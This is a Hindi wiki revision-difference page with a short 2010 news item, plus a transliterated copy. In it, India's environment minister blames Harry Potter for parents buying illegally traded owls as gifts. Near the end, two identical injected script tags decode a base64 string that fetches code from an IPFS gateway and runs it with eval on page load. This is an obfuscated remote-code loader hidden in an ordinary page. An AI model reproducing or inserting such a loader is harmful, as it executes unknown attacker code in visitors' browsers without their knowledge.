Difference between revisions of "उल्लू"

भारत डिस्कवरी प्रस्तुति
Jump to navigation Jump to search
[unchecked revision][unchecked revision]
('==समाचार== ====<u>गुरुवार, 4 नवम्बर, 2010</u>==== '''<u>उल्लूओं पर ख़तर...' के साथ नया पन्ना बनाया)
 
Line 1: Line 1:
 
==समाचार==
 
==समाचार==
 
====<u>गुरुवार, 4 नवम्बर, 2010</u>====
 
====<u>गुरुवार, 4 नवम्बर, 2010</u>====
'''<u>उल्लूओं पर ख़तरा</u>'''
+
'''<u>हैरी पॉटर के कारण आया उल्लूओं पर खतरा</u>'''
  
 
पर्यावरण मंत्री जयराम नरेश ने कहा है कि मशहूर किताब और फ़िल्म हैरी पॉटर से प्रभावित हो कर माता-पिता अपने बच्चों को उपहार में असली उल्लू (पक्षी) दे रहे हैं। इससे उल्लूओं की संख्या में कमी आ रही है। विलुप्त हो रही प्रजातियों के पक्षियों के गैर-कानूनी व्यापार पर ट्रैफिक नामक एक गैर-सरकारी संगठन द्वारा जारी रिपोर्ट के बाद केंद्रीय पर्यावरण मंत्री ने कहा कि हैरी पॉटर की फ़िल्म ने शहरी मध्यमवर्गीय परिवार को ख़ासा प्रभावित किया है। फ़िल्म से प्रभावित बच्चे अपने मां-बाप से असली उल्लू की मांग कर रहे हैं और उनकी मांग को पूरा करने के लिए मां-बाप पशु-पक्षियों का गैर-क़ानूनी रूप से व्यापार करने वालों से संपर्क कर रहे हैं...  
 
पर्यावरण मंत्री जयराम नरेश ने कहा है कि मशहूर किताब और फ़िल्म हैरी पॉटर से प्रभावित हो कर माता-पिता अपने बच्चों को उपहार में असली उल्लू (पक्षी) दे रहे हैं। इससे उल्लूओं की संख्या में कमी आ रही है। विलुप्त हो रही प्रजातियों के पक्षियों के गैर-कानूनी व्यापार पर ट्रैफिक नामक एक गैर-सरकारी संगठन द्वारा जारी रिपोर्ट के बाद केंद्रीय पर्यावरण मंत्री ने कहा कि हैरी पॉटर की फ़िल्म ने शहरी मध्यमवर्गीय परिवार को ख़ासा प्रभावित किया है। फ़िल्म से प्रभावित बच्चे अपने मां-बाप से असली उल्लू की मांग कर रहे हैं और उनकी मांग को पूरा करने के लिए मां-बाप पशु-पक्षियों का गैर-क़ानूनी रूप से व्यापार करने वालों से संपर्क कर रहे हैं...  

Revision as of 04:09, 12 November 2010

samachar

guruvar, 4 navambar, 2010

hairi p aautar ke karan aya ulloooan par khatara

paryavaran mantri jayaram naresh ne kaha hai ki mashahoor kitab aur film hairi p aautar se prabhavit ho kar mata-pita apane bachchoan ko upahar mean asali ulloo (pakshi) de rahe haian. isase ulloooan ki sankhya mean kami a rahi hai. vilupt ho rahi prajatiyoan ke pakshiyoan ke gair-kanooni vyapar par traiphik namak ek gair-sarakari sangathan dvara jari riport ke bad keandriy paryavaran mantri ne kaha ki hairi p aautar ki film ne shahari madhyamavargiy parivar ko khasa prabhavit kiya hai. film se prabhavit bachche apane maan-bap se asali ulloo ki maang kar rahe haian aur unaki maang ko poora karane ke lie maan-bap pashu-pakshiyoan ka gair-qanooni roop se vyapar karane valoan se sanpark kar rahe haian...

samachar ko vibhinn strotoan par padhean

panne ki pragati avastha
adhar
prarambhik
madhyamik
poornata
shodh

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script> <script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>

tika tippani aur sandarbh